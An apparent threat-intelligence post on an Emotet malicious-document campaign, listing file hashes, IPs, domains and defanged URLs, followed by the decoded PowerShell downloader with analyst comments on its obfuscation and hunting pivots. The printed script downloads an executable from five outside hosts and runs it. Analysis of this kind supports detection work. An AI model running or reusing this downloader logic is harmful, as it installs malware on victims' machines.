- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 26991e003c7df1b7ed815750866abd09
- 5530dd44a68abf23a1a96a698b6a6265
- b0f5b83ed27dde1c0f30cd1701173608
- e2c83ddac7314b94a5bffbbef718c2e2
- 9af6552d4936870dc260b76a26d3ac34
- IPs:
- 104.31.70.84
- 166.62.10.28
- 185.104.45.162
- 65.182.101.179
- 92.53.96.232
- Domains:
- foodwaydelivery.com
- invisio-new.redstone.studio
- royalbluebustour.com
- sm-n.ru
- stoeltje.com
- URLs:
- hxxp://foodwaydelivery.com/all-backup/wp-admin/oa5hfhw/
- hxxp://royalbluebustour.com/wp-admin/oqjbod/
- hxxp://sm-n.ru/wp-includes/eTCOWfxoe/
- hxxp://invisio-new.redstone.studio/wp-content/ybeq/
- hxxp://stoeltje.com/AdventuresInBabysitting/l8rn/
- Decoded Base64 PowerShell (downloader stage; URLs defanged as hxxp):
- $Qgxbzbieqrrx='Irxpoxjkowz';  # Decoded downloader stage. Assignments like this one are never read again in the listing; they appear to be obfuscation filler.
- $Wpxifjsilvrqc = '890';  # Base name of the dropped file.
- $Ckgyxfynsnxv='Gqnmyuddta';  # Unused filler.
- $Waazouqp=$env:userprofile+'\'+$Wpxifjsilvrqc+'.exe';  # Drop path resolves to %USERPROFILE%\890.exe, a host-side hunting pivot.
- $Kfsacchqb='Tznquykrsj';  # Unused filler.
- $Glmodecoxsyda=.('new-'+'o'+'bjec'+'t') NET.weBCLIENt;  # Calls New-Object via a name concatenated at runtime, creating a Net.WebClient; the split name and mixed case defeat literal string matching.
- $Fmctosxtdci='hxxp://foodwaydelivery.com/all-backup/wp-admin/oa5hfhw/
- hxxp://royalbluebustour.com/wp-admin/oqjbod/
- hxxp://sm-n.ru/wp-includes/eTCOWfxoe/
- hxxp://invisio-new.redstone.studio/wp-content/ybeq/
- hxxp://stoeltje.com/AdventuresInBabysitting/l8rn/'."sp`lit"('
- ');  # One string holding five URLs, split on newline into a list. The hxxp scheme looks like defanging by the paste author, and the backtick inside "split" is an escape that breaks up the method name.
- $Xjnyaozr='Svsvskuoxj';  # Unused filler.
- foreach($Muyiwcipde in $Fmctosxtdci){try{$Glmodecoxsyda."dO`WnlO`ADfILE"($Muyiwcipde, $Waazouqp);  # Tries each URL in order with WebClient.DownloadFile, writing to the drop path; detections should strip backticks and compare case-insensitively.
- $Umkdifiju='Curpdgbcpf';  # Unused filler.
- If ((.('G'+'et'+'-Item') $Waazouqp)."LENG`Th" -ge 26372) {[Diagnostics.Process]::"S`TART"($Waazouqp);  # Launches the file only if it is at least 26372 bytes - presumably to skip error pages or truncated responses (unconfirmed).
- $Xzgzwelndtoa='Guiwqwjqbavrh';  # Unused filler.
- break;  # Stops after the first payload that passes the size check and is started.
- $Lymgsfiyj='Kyybdppkvig'}}catch{}}$Kihyfefwogru='Vqxvzjzllrzx'  # The assignment after break is unreachable; the empty catch swallows errors so a failed URL falls through to the next one.